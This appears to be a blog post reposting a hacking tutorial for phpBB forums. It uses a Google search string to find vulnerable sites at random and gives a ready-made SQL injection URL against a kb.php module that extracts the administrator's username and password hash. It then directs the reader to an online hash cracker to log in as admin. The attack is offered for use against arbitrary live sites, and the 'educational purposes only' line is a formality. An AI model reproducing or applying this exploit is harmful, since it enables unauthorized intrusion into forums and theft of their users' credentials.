I already posted a step by step video for this hack
the video is located @ [quote]http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html[/quote]
Well get back to work
What we need for this hack to work:
1: A pc with internet connection
2: our friend (Google)
3: The sql injection code
4. And finally the target.
lets do it step by step:
open up google and type "Modified by Fully Modded" in search bar.
it will give many results, select any one randomly.
this is what you most likely be getting after you search for the above string.
Just have a look at the target
now we have the target, its time to inject our target now:
for injection we use the following string :
[code]http://site.com/forum/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1[/code]Now from the above string [replace the site.com/forum/] with you target site and forum path
Hit enter and wait for the page to load fully
Well this sql injection will give you the admins username along with the hash
now you need to break the hash in order to login as admin
To break the hash use
http://www.milw0rm.com/cracker/insert.php
enter the hash their and click on submit and it will give you the password
All credit goes to the original author
Source: http://hacking.isgreat.org/community/showthread.php?t=1015
Note: This is for educational purposes only, don't cause harm to anyone using this exploit
Enjoy!
0 comments:
Post a Comment